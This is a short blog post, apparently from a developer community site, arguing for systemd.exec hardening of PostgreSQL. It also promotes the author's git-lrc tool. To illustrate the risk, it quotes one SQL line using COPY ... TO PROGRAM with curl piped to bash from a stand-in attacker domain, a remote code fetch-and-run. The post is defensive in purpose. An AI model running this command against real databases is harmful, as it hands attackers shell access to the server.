Hello, I'm Ganesh. I'm building git-lrc, an AI code reviewer that runs on every commit. It is free, unlimited, and source-available on Github. Star Us to help devs discover the project. Do give it a try and share your feedback for improving the product.
In previous article I explained few core features of the Systemd configuration. In this article, I will be going to demonstrate how to use these options to secure Postgres service running in systemd.
Postgres is a popular relational database management system. It is widely used in enterprise applications.
Postgres can be run in systemd and can be secured using systemd.exec options.
Why Postgres need systemd.exec options?
If any one breached the db access they not only get the data but also get access to shell access of the server.
With use of postgrace copy to function.
COPY (SELECT 1) TO PROGRAM 'curl -L https://{attacker-domain.com}/install | bash';
This way they can break through the database and get access to the server.
To remove this access there are multiple ways
- creating roles based postgresql access and remove all pgexec to specific role.
- Blocking port access to internet.
Still, this feature will be accessible to admin user.
Lot of discussion went on adding disable feature in pg but many also argued that this is core function as Select feature is such that it can't be removed.
Also some also says it is core function many other's use for thier company opertion.
To disable this feature in postgres, as we saw in previous article we can use systemd.exec options.
Coming Up Next
we will securing Postgrace access using systemd.exec options.
Discussion in HN: https://news.ycombinator.com/item?id=37164115
PostgreSQL Discussion : https://www.postgresql.org/message-id/CAKFQuwZZ0zAMpp2KjBr5bUS7RvBqouD2Kqne6YtbgZn%3DnzL1xA%40mail.gmail.com
Any feedback or contributors are welcome! It’s online, source-available, and ready for anyone to use.
⭐ Star it on GitHub: https://github.com/HexmosTech/git-lrc
Top comments (0)